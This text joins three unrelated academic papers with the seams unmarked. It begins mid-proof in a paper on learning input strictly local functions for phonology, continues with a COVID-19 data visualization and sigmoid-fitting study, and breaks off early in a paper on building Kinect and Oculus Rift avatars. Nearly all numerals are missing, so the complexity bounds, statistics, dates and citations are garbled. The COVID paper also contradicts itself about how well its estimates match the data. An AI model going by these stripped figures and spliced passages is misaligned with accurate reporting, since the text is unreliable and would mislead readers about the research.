a ∈ Σ; therefore, |q | ≥ k + . this means ∃q′ ∈ Σk between q and q , which will be merged with some other state before q will. this merge will cause non-determinism, which in turn will trigger pushback and cause u to move further down the branch toward q . by extension there will be |q |−k states between q and q , each of which will be merged, triggering pushback of u, so that by the time q and q are merged, δ (q , #) = ux = z = δ (q , #). thus, all non-determinism can be removed, and so t is subsequential. it remains to show that ∀q ∈ qt ,a ∈ Σ, δ (q,a) = suff k− (qa). since state merging pre- serves transitions, this follows from the construction of ptt(d). by theorem , t = t islf . next we establish complexity bounds on the run- time of the islfla and the size of the characteristic sample for isl functions. we observe that both of these bounds improve the bounds of ostia. while not surprising, since isl functions are less general than subsequential functions, the result is important since it is an example of greater a priori knowledge enabling learning with less time and data. let m be the length of the longest output string in the sample and let n denote the number of states of the ptt; n is at most the sum of the lengths of the input strings of the pairs in the sample. lemma (polynomial time). the time complexity of the islfla is in o(n ·m ·k · |Σ|). proof. first, making the ptt onward can be done in o(m · n): it consists of a depth-first parsing of the ptt from its root, with a computation at each state of the lcp of the outgoing transition outputs after the recursive computation of the function (see de la higuera ( ), chap. , for details). as the com- putation of the lcp takes at most m steps, and as it has to be done for each state, the complexity of this step is effectively in o(m ·n). for the two loops, we need to find a bound on the number of merges that can occur. states q such that |q| < k do not yield any merges in the outer loop. all other states q′ are merged with suffk− (q), in the outer loop or in the inner one. the number of merges is thus bounded by n. computing the suffix of length (k − ) of any word can be done in o(k) with a correct implementation of strings of charac- ters. the test of the inner loop can be done in con- stant time and so can the merge and pushback pro- cedures. after each merge, the test of the inner loop needs to be done at most |Σ| times. as computing the lcp has a complexity in o(m), the overall com- plexity of the two loops is in o(n ·m ·k · |Σ|). the overall complexity of the algorithm is thus o(m ·n + n ·m ·k · |Σ|) = o(n ·m ·k · |Σ|). let t islf = (q,q , Σ, Γ,δ,σ) be a target trans- ducer. we define m = max{|u| | (q,a,u,q′) ∈ δ}, n = |q|, and p = max {|v| | (q, #,v) ∈ σ}. lemma (polynomial data). the size of the charac- teristic sample is in o(n·|Σ|·k·m+n ·m+n·|Σ|·p). proof. the first item of the seed, s′, covers all and only the states of the target: the left projection of these pairs is thus linear in n and every right projec- tion is at most n · m + p. thus the size of s′ is at most n · (n + n ·m + p) = o(n ·m + n ·p). concerning the second part, s′′, its cardinality is at most n · |Σ| (in the rare case where q′ = q). each element of the left projection of s′′ is of length (k + ) and each element of its right projection is at most of length (k + )·m+p. the size of s′′ is thus in o(n · |Σ| · (k ·m + p)). therefore, the size of the characteristic sample is in o(n·|Σ|·k·m+n ·m+n·|Σ|·p), which is clearly polynomial in the size of the target transducer. theorem . the islfla identifies the class of isl functions in polynomial time and data. proof. immediate from lemmas , , and . . demonstrations we tested the islfla with the three examples in § , as well as the english flapping process (t → r / v́ v). for each case, a data set was constructed according to definition using the alphabets pre- sented in § . the alphabet for english flapping was {v́, v, t, ?}. the value of k is for final devoicing, @-epenthesis, and fricative deletion and for english flapping. a few additional data points of length or were also added to make the data set a superset of the seed. in all four cases, the learner returned the correct t islf . the decision to use artificial corpora in these demonstrations was motivated by the fact that the sample in definition will not be present in a natural language corpus. that sample includes all possible sequences of symbols from the alphabet of a given length, whereas a natural language corpus will re- flect the language-particular restrictions against cer- tain segment sequences (i.e., phonotactics). as discussed in the introduction, gildea and ju- rafsky ( ) address this issue with natural lan- guage data by equipping ostia with a community bias, whereby segments belonging to a natural class (i.e., stops, fricatives, sonorants) are expected to be- have similarly, and a faithfulness bias, whereby seg- ments are assumed to be realized similarly on the surface. in our demonstrations we put aside the is- sue of the behavior of segments in a natural class by using abbreviated alphabets (e.g., t for all voiceless stops). but if in fact knowledge of natural classes precedes the learning of phonological processes, the use of such an alphabet is appropriate. in future developments of the islfla we like- wise aim to accommodate natural language data, but in a way that maintains the theoretical result of identification in the limit. the restrictions on seg- ment sequences represented in natural language data amount to ‘missing’ transitions in the initial prefix tree transducer that is built from that data. in other words, the transducer represents a partial, not a to- tal function. thus it seems the approach of oncina and varò ( ) and castellanos et al. ( ) could be very instructive, as their use of domain informa- tion enabled ostia to learn partial functions. in our case, the fact that the domain of an isl function is an sl language could provide a means of ‘filling in’ the missing transitions. the details of such an approach are, however, being left for future work. conclusion this paper has defined input and output strictly local functions, which synthesize the properties of subsequential transduction and strictly local formal languages. it has provided language-theoretic char- acterizations of these functions and argued that they can model many phonological and morphological processes. lastly, an automata-theoretic character- ization of isl functions was presented, along with a learning algorithm that efficiently learn this class in the limit from positive data. current work includes developing a comparable automata characterization and learning algorithm for osl functions, as well as defining additional func- tional classes to model those phonological processes that cannot be modeled with isl or osl functions. the sl languages are just one region of a subregu- lar hierarchy of formal languages (mcnaughton and papert, ; rogers and pullum, ; rogers et al., ). the isl and osl functions defined here are the first step in developing a corresponding hi- erarchy of subregular functions. of immediate in- terest to phonology are functional counterparts for the tier-based strictly local and strictly piecewise language classes, which have been shown to model long-distance phonotactics (heinz, ; heinz et al., ). such functions might be useful for mod- eling the long-distance processes that repair viola- tions of these phonotactic constraints. acknowledgements we thank adam jardine, jim rogers, and the three anonymous reviewers for helpful comments. this research was supported by nsf cps# . references dana angluin. . inference of reversible languages. journal for the association of computing machinery, ( ): – . kenneth r. beesley and lauri karttunen. . finite state morphology. center for the study of language and information. william bennett. . dissimilation, consonant har- mony, and surface correspondence. ph.d. thesis, rut- gers university. antonio castellanos, enrique vidal, miguel a. varó, and josé oncina. . language understanding and sub- sequential transducer learning. computer speech and language, : – . jane chandlee and jeffrey heinz. . bounded copy- ing is subsequential: implications for metathesis and reduplication. in proceedings of sigmorphon . jane chandlee and adam jardine. . learn- ing phonological mappings by learning strictly local functions. in john kingston, claire moore-cantwell, joe pater, and robert staubs, editors, proceedings of the meeting on phonology. lsa. jane chandlee and cesar koirala. . learning local phonological rules. in proceedings of the th penn linguistics conference. jane chandlee, angeliki athanasopoulou, and jeffrey heinz. . evidence for classifying metathesis patterns as subsequential. in the proceedings of the th west coast conference on formal linguistics, somerville, ma. cascadilla. jane chandlee. . strictly local phonological pro- cesses. ph.d. thesis, university of delaware. noam chomsky and morris halle. . the sound pattern of english. harper & row, new york. colin de la higuera. . characteristic sets for poly- nomial grammatical inference. machine learning, ( ): – . colin de la higuera. . grammatical inference: learning automata and grammars. cambridge uni- versity press. brian gainor, regine lai, and jeffrey heinz. . computational characterizations of vowel harmony patterns and pathologies. in the proceedings of the th west coast conference on formal linguistics, pages – , somerville, ma. cascadilla. daniel gildea and daniel jurafsky. . learning bias and phonological-rule induction. computational lin- guistics, ( ): – . e. mark gold. . language identification in the limit. information and control, : – . gunnar hansson. . theoretical and typological is- sues in consonant harmony. ph.d. thesis, university of california, berkeley. jeffrey heinz and regine lai. . vowel harmony and subsequentiality. in andras kornai and marco kuhlmann, editors, proceedings of the th meeting on the mathematics of language (mol ), pages – . jeffrey heinz, chetan rawal, and herbert g. tanner. . tier-based strictly local constraints for phonol- ogy. in proceedings of the th annual meeting of the association for computational linguistics, pages – . association for computational linguistics. jeffrey heinz. . the inductive learning of phono- tactic patterns. ph.d. thesis, university of california, los angeles. jeffrey heinz. . on the role of locality in learning stress patterns. phonology, : – . jeffrey heinz. . learning long-distance phonotac- tics. linguistic inquiry, : – . mans hulden, iñaki alegria, izaskun etxeberria, and montse maritxalar. . learning word-level dialec- tal variation as phonological replacement rules using a limited parallel corpus. in proceedings of the first workshop on algorithms and resources for modelling of dialects and language varieties, dialects ’ , pages – . association for computational linguis- tics. mans hulden. . finite-state machine construction methods and algorithms for phonology and morphol- ogy. ph.d. thesis, university of arizona. adam jardine. . tone is (computationally) differ- ent. unpublished manuscript, university of delaware. c. douglas johnson. . formal aspects of phonolog- ical description. the hague, mouton. brian d. joseph and irene philippaki-warburton. . modern greek. croom helm, wolfeboro, nh. ronald m. kaplan and martin kay. . regular mod- els of phonological rule systems. computational lin- guistics, : – . huan luo. . long-distance consonant harmony and subsequentiality. unpublished manuscript, university of delaware. robert mcnaughton and seymour a. papert. . counter-free automata. mit press. mehryar mohri. . finite-state transducers in lan- guage and speech processing. computational linguis- tics, : – . josé oncina and pedro garcı́a. . inductive learning of subsequential functions. technical report dsic ii- , university politécnia de valencia. josé oncina and miguel a. varò. . using do- main information during the learning of a subsequen- tial transducer. lecture notes in computer science - lecture notes in artificial intelligence, pages – . josé oncina, pedro garcı́a, and enrique vidal. . learning subsequential transducers for pattern recog- nition interpretation tasks. ieee transactions on pat- tern analysis and machine intelligence, ( ): – . amanda payne. . dissimilation as a subsequen- tial process. unpublished manuscript, university of delaware. alan prince and paul smolensky. . optimality theory: constraint interaction in generative gram- mar. technical report , rutgers university center for cognitive science. jason riggle. . non-local reduplication. in pro- ceedings of the th annual meeting of the north east- ern linguistic society. james rogers and geoffrey k. pullum. . aural pat- tern recognition experiments and the subregular hier- archy. journal of logic, language and information, : – . james rogers, jeffrey heinz, margaret fero, jeremy hurst, dakotah lambert, and sean wibel. . cog- nitive and sub-regular complexity. in glyn morrill and mark-jan nederhof, editors, formal grammar, lec- ture notes in computer science, volume , pages – . springer. sharon rose and rachel walker. . a typology of consonant agreement as correspondence. language, : – . keiichiro suzuki. . a typological investigation of dissimilation. ph.d. thesis, university of arizona. natasha warner, allard jongman, anne cutler, and doris mücke. . the phonological status of dutch epenthetic schwa. phonology, : – . sample paper title international journal of advanced network, monitoring and controls volume , no. , doi: . /ijanmc- - data visualization analysis of covid- epidemic situation yang tao nanchang institute of science and technology nanchang, china e-mail: taoyangxp@ .com abstract— novel coronavirus (covid- ) has brought immeasurable losses and huge impact to the world. for human health, many centres for disease control(cdc) in various countries around the world are actively collecting data and doing a good job in virus prevention and control. the real-time release of the epidemic situation, with analysis and prediction, is a very effective method to combat the epidemic. by studying the situation of epidemic data, based on jupyter notebook, this paper gives the visual analysis process of covid- epidemic data, and carries out specific analysis and implementation. and then it estimates the coronavirus converges roughly using sigmoid fitting. although the sigmoid fitting tend to underestimate the curve, its actual value tend to be more than sigmoid curve estimation. the proposed data visualization analysis method could effectively display the status of the covid- epidemic situation, hoping to help control and reduce the impact of the covid- epidemic. keywords—covid- ; data visualization; situation dashboard; jupyter notebook; epidemic situation i. in tr od uc ti on novel coronavirus ( -ncov) is a virus (more specifically, a coronavirus) identified as the cause of an outbreak of respiratory illness. a growing number of patients reportedly have indicated person-to- person spread is occurring. at this time, it’s unclear how easily or sustainably this virus is spreading between people. therefore, it is very important to visually analyse the covid- epidemic situation, which helps to control the impact of the covid- epidemic and reduce losses. ii. lo ad data the dataset has daily level information on the number of affected cases, deaths and recovery from novel coronavirus. this is a time series data and so the number of cases on any given day is the cumulative number. the data is available from jan, . we can download latest data from johns hopkins university github repository: https://github.com/cssegisanddata/covid- [ ].we can also grab data from various centres for disease control [ - ]. the data folder contains the previously posted dashboard case reports from jan to feb , for the coronavirus covid- (formerly known as - ncov). we will refer to the data provided in the new folder, entitled "csse_covid_ _data folder". moving forward they will be updating daily case reports into this new folder. additionally, the previously uploaded data from jan -feb , is also included in the new folder, and it has been cleaned and re-formatted to address inconsistencies in the time zone and update frequency that resulted during the transition from our manual updates to automated updates (which took place on feb , . the new folder now includes one case report per day, from the same time of day. this will be the standard moving forward (as of feb , ). that is the data we will load for visualization analysis. main file in this dataset is covid_ _data.csv and the detailed descriptions are below.  sno - serial number  observationdate - date of the observation in mm/dd/yyyy. we will convert observationdate and last update to datetime since they are currently taken as object. international journal of advanced network, monitoring and controls volume , no. ,  province/state - province or state of the observation (could be empty when missing)  country/region - country of observation  last update - time in utc at which the row is updated for the given province or country. (not standardised and so please clean before using it)  confirmed - cumulative number of confirmed cases till that date  deaths - cumulative number of deaths till that date  recovered - cumulative number of recovered cases till that date iii. visu aliz ati o n an aly sis for the purpose of data visualization, we mainly use the python-based tools of jupyter notebook[ ] and plotly[ ]. the jupyter notebook is an open-source web application that allows you to create and share documents that contain live code, equations, visualizations and narrative text. uses include: data cleaning and transformation, numerical simulation, statistical modeling, data visualization, machine learning, and much more. the plotly visualization is heavy used in this kernel so that we can interactively see the figure, map etc. as a side effect, it might take a little bit more time to initialize the python environment and to load the kernel. then grab data from the internet and load the data. a. worldwide trend when we see the confirmed cases in worldwide, it just look like exponential growth curve. the number is increasing very rapidly especially recently. as a further matter, daily new confirmed cases started not increasing from april . after that, flat trend continues so far, as shown in figure . figure . worldwide confirmed/death cases over time moreover, when we check the growth in log-scale below figure, we can see that the speed of confirmed cases growth rate slightly increases when compared with the beginning of march and end of march. in spite of the lockdown policy in europe or us, the number is still increasing rapidly, as shown in figure . figure . worldwide confirmed/death cases over time (log scale) it looks like fatalities curve is just shifted the confirmed curve to below in log-scale, which means mortality rate is almost constant. we see that mortality rate is kept almost %, however it is slightly increasing gradually to go over % at the end of april. europe & us has more seriously infected by coronavirus recently, and mortality rate is high in these regions, as shown in figure . it might be because when too many people get coronavirus, the country cannot provide enough medical treatment. figure . worldwide mortality rate over time b. country-wise growth there are countries in the dataset. how's the distribution of number of confirmed cases by country? it is difficult to see all countries so let's check top countries as shown in figure . international journal of advanced network, monitoring and controls volume , no. , figure . confirmed cases/deaths on - - now us, italy and spain has more confirmed cases than china, and we can see many europe countries in the top. korea also appears in relatively top despite of its population, this is because korea executes inspection check aggressively. let's check these major country's growth by date. as we can see, coronavirus hit china at first but its trend is slowing down in march which is good news. bad news is nd wave comes to europe (italy, spain, germany, france, uk) at march. but more sadly rd wave now comes to us, whose growth rate is much faster than china, or even europe. its main spread starts from middle of march and its speed is faster than italy. now us seems to be in the most serious situation in terms of both total number and spread speed. now let’s see the confirmed cases for the top countries, as shown in figure . figure . confirmed cases for top country as of - - in terms of number of fatalities, europe & us are serious situation now, as shown in figure . many countries have more fatalities than china now, including us, italy, spain, france, uk, iran belgium, germany, brazil, netherlands. us's spread speed is the fastest, us's fatality cases become top on apr th. figure . fatalities for top country as of - - now let's see mortality rate by country, as shown in figure . italy is the most serious situation, whose mortality rate is over % as of / / .we can also find countries from all over the world when we see top mortality rate countries, as shown in figure . iran/iraq from middle east, philippines & indonesia from tropical areas. spain, netherlands, france, and uk form europe etc. it shows this coronavirus is really worldwide pandemic. the countries whose mortality rate is low are shown in figure . by investigating the difference between above & below countries, we might be able to figure out what is the cause which leads death. be careful that there may be a case that these country's mortality rate is low due to these country does not report/measure fatality cases properly. figure . mortality rate high: top countries on - - international journal of advanced network, monitoring and controls volume , no. , figure . mortality rate high: top countries on - - let's see number of confirmed cases on map. again we can see europe, us, middle east (turkey, iran) and asia (china, korea) are red, as shown in figure . figure . countries with confirmed cases on - - the number of fatalities on map is shown as figure and the mortality rate map is shown as figure . when we see mortality rate on map, we see europe (especially italy) is high. also we notice middle east (iran, iraq) is high. when we see tropical area, i wonder why philippines and indonesia are high while other countries (malaysia, thai, vietnam, as well as australia) are low. for asian region, korea's mortality rate is lower than china or japan, i guess this is due to the fact that number of inspection is quite many in korea[ - ]. from the mortality rate map, it seems that mortality rate is especially high in europe region, compared to us or asia. figure . countries with fatalities on - - figure . countries with mortality rate on - - why mortality rate is different among country? what kind of hint is hidden in this map? especially mortality rate is high in europe and us, is there some reasons? there is one interesting hypothesis that bcg vaccination[ ]. c. daily new confirmed cases trend let’s see the daily new cases trend as shown in figure . figure . daily new confirmed cases worldwide international journal of advanced network, monitoring and controls volume , no. , we find from the figure :  china has finished its peak at feb , new confirmed cases are surpressed now.  europe&us spread starts on mid of march, after china slows down.  as effect of lock down policy in europe (italy, spain, germany, france) now comes on the figure, the number of new cases are not so increasing rapidly at the end of march.  current us new confirmed cases are the worst speed, recording worst speed at more than k people/day at peak. daily new confirmed cases start to decrease from april or april .  after that we can see a weekly trend that the confirmed cases becomes small on monday. i think this is because people don't (or cannot) get medical care on sunday so its reporting number is low on sunday or monday. d. zoom up to us as we can see, the spread is fastest in us now, at the end of march. let's see in detail what is going on in us. when we see inside of the us, we can see only new york, and its neighbour new jersey dominates its spread and are in serious situation. the number of new york confirmed cases is over k, while other states are less than about k confirmed cases, as shown in figure . figure . confirmed cases in us on - - mortality rate in new york seems not high, around % for now, as shown in figure . figure . mortality rate in us on - - all state is us got affected from middle of march, and now growing exponentially. in new york, less than k people are confirmed on march , but more than k people are confirmed on march . times explosion in weeks! the confirmed cases by state in us is show in figure . figure . confirmed cases by state in us, as of - - e. zoom up to europe when we look into the europe, its northern & eastern areas are relatively better situation compared to eastern & southern areas. the map of european countries with confirmed cases is shown as figure and figure . international journal of advanced network, monitoring and controls volume , no. , figure . european countries with confirmed cases, as of - - figure . confirmed cases by country in europe, as of - - especially italy, spain, german, france, uk are in more serious situation. number of confirmed cases rapidly increasing in russia now (as of may ), russia is now potentially very dangerous situation. when we check daily new cases in europe(as shown in figure ), we notice:  uk and russia daily growth are more than italy now. these countries are potentially more dangerous now.  italy new cases are not increasing since march , maybe due to lock-down policy is started working. figure . daily new confirmed cases by country in europe f. zoom up to asia in asia, china & iran have many confirmed cases, followed by south korea & turkey. asian countries with confirmed cases is as shown in figure . figure . confirmed cases by country in asia, as of - - the coronavirus hit asia in early phase, how is the situation now? china & korea is already in decreasing phase. unlike china or korea, daily new confirmed cases were kept increasing on march or april, especially in iran or japan. but the number is started to decrease now on these country as well, as shown in figure . international journal of advanced network, monitoring and controls volume , no. , figure . daily new confirmed cases in asia, as of - - iv. es tim ati o n of course everyone is wondering when the coronavirus converges. let's estimate it roughly using sigmoid fitting. i referenced two kernels[ - ] for original ideas. the fitting result is shown in figure . sigmoid fitting with all latest data figure . sigmoid fitting with all latest data if believe above curve, the number of confirmed cases is slowing down now and it will be converging around the beginning of may in most of the country. it might take until beginning on june in us. let's try validation by excluding last days data, as shown in figure . figure . sigmoid fitting without last days data now noticed that sigmoid fitting tend to underestimate the curve, and its actual value tend to be more than sigmoid curve estimation. therefore, need to be careful to see sigmoid curve fitting data; actual situation is likely to be worse than the previous figure trained with all data. v. co nc lus io n based on data available on may , the paper showed the visualization of the covid- epidemic situation, including the worldwide trend, country-wide growth, and so on. then it estimated when the coronavirus converges roughly using sigmoid fitting. the model's estimates and predictions closely match reported confirmed cases. therefore the proposed data visualization analysis method could effectively display the status of the covid- epidemic situation, hoping to help control and reduce the impact of the covid- epidemic. the next steps include applying the method to global covid- death data into small regions, as provinces. the method of visualization analysis could also be used to evaluate population mortality and the spread of other diseases. ac kn o wle d gme n ts the authors wish to thank corochann, who is an engineer at preferred networks in tokyo. this work was supported in part by the ph.d. research initiation fund of nanchang institute of science and technology with the project (no. ngrczx- - ) and supported by robot and intelligent system research centre of artificial intelligence college of nanchang institute of science and technology (no.ngyzy- - ). international journal of advanced network, monitoring and controls volume , no. , refe ren ces [ ] https://www.kaggle.com/benhamner/covid- -forecasting-challenges- week- -data-prep. [ ] china cdc (ccdc): http://weekly.chinacdc.cn/news/trackingtheepidemic.htm [ ] taiwan cdc: https://sites.google.com/cdc.gov.tw/ ncov/taiwan?authuser= [ ] us cdc: https://www.cdc.gov/coronavirus/ -ncov/index.html [ ] government of canada: https://www.canada.ca/en/public- health/services/diseases/coronavirus.html [ ] european centre for disease prevention and control (ecdc): https://www.ecdc.europa.eu/en/geographical-distribution- -ncov- cases [ ] jupyter notebook - project jupyter | home. https://jupyter.org/ [ ] plotly: the front-end for ml and data science models. https://plotly.com/ [ ] south korea launches 'drive-thru' coronavirus testing facilities as demand soars. https://www.japantimes.co.jp/news/ / / /asia- pacific/science-health-asia-pacific/south-korea-drive-thru- coronavirus/#. xoamw j rpy [ ] coronavirus: why japan tested so few people. https://asia.nikkei.com/spotlight/coronavirus/coronavirus-why- japan-tested-so-few-people [ ] if i were north american/west european/australian, i will take bcg vaccination now against the novel coronavirus pandemic. https://www.jsatonotes.com/ / /if-i-were-north- americaneuropeanaustral.html [ ] sigmoid per country. https://www.kaggle.com/group /sigmoid-per- country-no-leakage [ ] covid- growth rates per country. https://www.kaggle.com/mikestubna/covid- -growth-rates-per- country. submitted february accepted july published july corresponding author renan c. moioli, moioli@isd.org.br academic editor alex james additional information and declarations can be found on page doi . /peerj-cs. copyright macedo silva and moioli distributed under creative commons cc-by . open access a method for creating interactive, user- resembling avatars igor macedo silva , and renan c. moioli centro de tecnologia, universidade federal do rio grande do norte, natal, rio grande do norte, brazil graduate program in neuroengineering, edmond and lily safra international institute of neuroscience, santos dumont institute, macaiba, rio grande do norte, brazil abstract virtual reality (vr) applications have disseminated throughout several fields, with a special quest for immersion. the avatar is one of the key constituents of immersive applications, and avatar resemblance can provoke diverse emotional responses from the user. yet a lot a virtual reality systems struggle to implement real life-like avatars. in this work, we propose a novel method for creating interactive, user-resembling avatars using available commercial hardware and software. avatar visualization is possible with a point-cloud or a contiguous polygon surface, and avatar interactions with the virtual scenario happens through a body joint-approximation for contact. in addition, the implementation could be easily extended to other systems and its modular architecture admits improvement both on visualization and physical interactions. the code is under apache license . and is freely available as supplemental information in this article. subjects human-computer interaction, emerging technologies keywords virtual reality, immersion, oculus rift, kinect, avatar embodiment introduction virtual reality (vr) is understood as an advanced human–computer user interface that mimics a realistic environment by linking human perception systems with a virtual environment (zheng, chan & gibson, ). the key point about vr is its attempt to provide seamless interaction with a computational environment, thus understanding human intent and creating a reasonable response from the virtual environment. the gaming industry has historically driven developments on vr (mills, ), contributing to lowering the cost of technology. there has been a growing demand for techniques or devices that improve the user’s ability to feel inside a game, surrounded by elements that promote the desired gameplay. to achieve that, the industry has turned to motion tracking devices and immersive d graphics, including head mounted displays (hmds), such as oculus rift, htc vive, and hololens, and motion tracking technologies, such as kinect, wii remote, leap motion, and virtuix omni vr treadmill. this recent surge of affordable vr devices expanded the number of vr applications. to mention but a few examples beyond the gaming scene, vr is now widely used in medical applications for physical rehabilitation (paolini et al., ; baldominos, saez & del pozo, ; draganov & boumbarov, ; morel et al., ; donati et al., ; shokur et al., ), exposure therapy for phobias and post-traumatic stress (notzon et al., ; how to cite this article macedo silva and moioli ( ), a method for creating interactive, user-resembling avatars. peerj comput. sci. :e ; doi . /peerj-cs. https://peerj.com mailto:moioli@isd.org.br https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://dx.doi.org/ . /peerj-cs. #supp- http://dx.doi.org/ . /peerj-cs. cuperus et al., ), treatment for addiction (park et al., ) and even autism (didehbani et al., ). other fields such as architecture and urban planning (portman, natapov & fisher-gewirtzman, ; luigi et al., ) and education (abulrub, attridge & williams, ) also benefit from the technology. however, as advanced as those technologies are, there are a few limitations to each of them. the technologies mentioned above, such as the hmds and motion tracking devices, tackle a single piece of the virtual reality interaction problem. the hmds give visual support for the simulation while motion tracking devices provide means for our body to interact with the virtual world. on one hand, most hmds deal exclusively with visual perceptions and head movement while completely ignoring any other body movement. as a result, hmds applications are usually static and display static, generic avatars, frustrating any kind of user interaction other than through vision and head movement. motion tracking devices, on the other hand, allow for whole-body user interaction but limit the immersion experience because they do not take into account the user’s visual field. therefore, users are limited on how they can interact with the system, depending on which device they use. a possible solution is to use the capabilities of both devices in an integrated hardware- software approach. ideally, this system would be able to track body movements, record user images and present them inside the head mounted display, reacting to what the user is looking at and how the user is moving. a key issue is that there is scarce information on how to integrate and utilize both technologies in one whole system. an example is shown by woodard & sukittanon ( ), explaining how both oculus rift and kinect could be used to create virtual interactive walkthroughs for building projects. however, they do not use the kinect’s full capabilities, such as body-frame detection and rgba frames to recreate the avatar and interact with the virtual environment. in accordance with growing evidence of the importance of avatar representation and interaction to obtain an improved immersion experience in virtual reality, this work presents a software approach to integrate a motion tracking device with depth sensing capabilities (kinect v ) to a head mounted display (oculus rift dk ) in order to improve the interaction and immersion perception in vr systems. this software uses the sdks of both devices, along with opengl for rendering graphics and bullet physics for physic simulations, to create a highly resembling d representation of the user in the virtual space. this d representation, henceforth referred to as avatar, is highly sensitive to the user’s movements and can interact with virtual objects in the virtual environment. the main result is a demo project that incorporates all of the necessary code to compile a neutral virtual environment with objects and the avatar. the code is under apache license . and is freely available as supplementary material. we believe that this work contributes to easily integrate hmds and motion tracking devices to expand real time immersive experience interaction. macedo silva and moioli ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. background and related work virtual reality technologies among the devices used on vr research, the oculus rift and the kinect are probably the most widely known products. both devices tackle specific problems underlying human– computer interfaces and, by the time of their launch, they brought innovative solutions to the common consumer. nowadays, there are a few other solutions that aim at offering the same range of features and usability of oculus rift and kinect. regarding depth cameras, such as the kinect, we can cite the asus xtion, depthsense camera, and leapmotion as alternatives. although leapmotion is the most accurate in comparison to the others, with spatial resolution of about mm (weichert et al., ), it has the shortest range of action of . m (leapmotion, ). another device called the depthsense camera is able to provide fps and depth ranging from cm to m, but its frames per second throughput diminishes quickly as the depth range increases, going from . m at fps to m at fps (depthsense, ). the asus xtion has a similar precision to the kinect v , as shown in gonzalez-jorge et al. ( ), and its most recent version is comparable to the kinect v in terms of technical specifications (asus, ; microsoft, b). yet the kinect has a much broader community and support from microsoft for its official sdk. this reflects specially in the number of applications and publications made with kinect or asus xtion. thus, considering the specifications shown here, we choose to use in our system the kinect v as the main interface for depth sensing. the first to appear on the market was the kinect v , in , with the official software development kit (sdk) released later on in (microsoft, a). in , a second iteration of the kinect was released (microsoft, b). the kinect v has a , p color camera operating at hz in good light conditions, a × depth sensing camera operating at hz and × field of view, sensing from . to . m, and active infrared capabilities with the same resolution. with its pose tracking capabilities and affordability, the kinect quickly made its way to the research scene. regarding accuracy for motion tracking, the kinect is adequate for most scientific purposes, including medical studies on posture and rehabilitation (clark et al., ; clark et al., ; zhao et al., ). in particular, otte et al. ( ) have shown that the kinect v can derive clinical motion parameters with comparable performance to that obtained by a gold standard motion capture system. as for virtual reality headset, the oculus rift was for a period the only option available. but, soon enough, companies started to unveil similar products and nowadays the oculus rift has a few competitors. some of them have yet to be commercially launched, such as the fove and star vr. two commercially available platforms are the playstation vr and the htc vive. both have very similar hardware specifications to the oculus rift (playstation, ; digitaltrends, ). the main difference is the price range: while the htc vive is priced at u$ , the playstation vr costs u$ and the oculus rift is sold for u$ . yet, the oculus rift has been in development since and has created a solid developer macedo silva and moioli ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. community. for this reason, the oculus rift is a sensible choice both in terms of hardware specifications and development support. the first release of the oculus rift, named dk , was for supporters only and occurred in . the second iteration was released in as dk , and the first commercial version was released in . the oculus rift dk improved the first iteration with a screen resolution of × , p per eye, a refresh rate of hz and persistence of about to ms. in addition, the head-mounted display has sensors to detect head motion both internally and externally. the immersion requirement if we understand vr as a human–computer interface, there are two core ideas that measure the quality of the interface: immersion and interactivity (zheng, chan & gibson, ). immersion occurs when the user is able to block out distractions, usually any perceptions from the real world, and then focus on the virtual elements with which one wants to work. interactivity is the possibility to interact with the events of the virtual world. both ideas are connected and interdependent. for example, if a vr system has low interactivity, the immersion factor might be affected. on the other hand, if the system is not immersive, the interactivity will be less engaging. the immersion requirement dictates the overall experience with a vr system. a previous study developed by alshaer, regenbrecht & o’hare ( ) identified three immersion factors which affect perception and the sense of self-presence in a vr system: the display type (head mounted display (hmd) or monitor), field of view (fov) and the user’s avatar. a poor tuning of these factors can cause discomfort and a sense that the virtual actions or events are absurd and do not reflect reality among users, eventually disrupting the immersive experience and causing a poor vr experience as a whole. avatar embodiment in vr systems, the avatar consists of a visual representation of the user, a construction made to visually communicate aspects of one’s identity and how he or she wants to be perceived. using the avatar, the user is able to give meaning to their virtual self and that correlates with the sense of presence (de frança & soares, ). the concept of presence, as mentioned by de frança & soares ( ), allows a discussion about self representations at three different, yet interdependent levels: body, affection and identity. focusing on those three levels is specially important in vr applications in order to improve the user’s performance in the system. in the discussion section, we present how the developed system exploits those levels in order to create sense of embodiment. this connection between avatar and physical self has been investigated. wrzesien et al. ( ) focused on how teenagers can learn to regulate their emotions by watching physically similar avatars deal with frustration. the authors concluded that when the avatar is modeled to resemble the human user, the intensity of the emotional states, emotional valence and arousal for each participant has a much greater level than that obtained when the avatar is neutral. this confirms that the similarity between the avatar and the user may cause a significant psychological response. macedo silva and moioli ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. another study (fox & bailenson, ) was concerned about how this similarity might modify behavior. after dividing the participants in groups with a virtual self representation or with another person representation, they were exposed to voluntary sessions of exercises with rewards and punishments. the research concluded that the group with virtual self representation exercised significantly more regardless of reward or punishment. both studies demonstrate that the avatar influences the overall experience on vr and expands this experience to the user in the physical world. similar results were obtained in a study by lugrin, landeck & latoschik ( ), confirming that behavior and performance are indeed altered by avatar representation. applications the avatar is a core concept for immersion in vr (alshaer, regenbrecht & o’hare, ), thus most vr applications benefit from improved user-resemblance and interactivity with the virtual environment. in the medical field, vr is broadly used for rehabilitation treatments. for example, the systems presented by rudinskiy et al. ( ), donati et al. ( ) or shokur et al. ( ) use vr with an avatar visualization for gait rehabilitation. in this case, an improved avatar visualization would help generating a better sense of immersion and could possibly help with the treatment. this improvement is thought to come from an increased engagement in the rehabilitation activities, which provokes intense and life-like emotions and behaviors. this motivates the user to perform the activities. another field that benefits from this technology is social studies. in a controlled environment, such as a virtual environment, it is possible to reproduce a variety of social phenomenons. a highly user-resembling avatar may improve the immersion experience and mimic social interactions. for example, stavroulia et al. ( ) creates a simulated environment to reproduce bullying occurrences inside a classroom. considering the benefits of an avatar representation, it is expected that such a simulation would benefit from the avatar generation method described here by improving on the overall experience of the system. as a last example, tourism or even architecture could benefit from this technology by giving the user an immersive experience in which they could feel immersed. it is probably easier to create a sense of space and dimensions if you can refer to your own body as a reference. in this sense, interior design professionals and students could use our method to showcase a project and literally place the observer inside the space to visually comprehend each detail of the project. in tourism, virtual environments can replicate interesting places and allow the user to see and even interact with elements through its own avatar. materials & methods hardware and development environment preparation 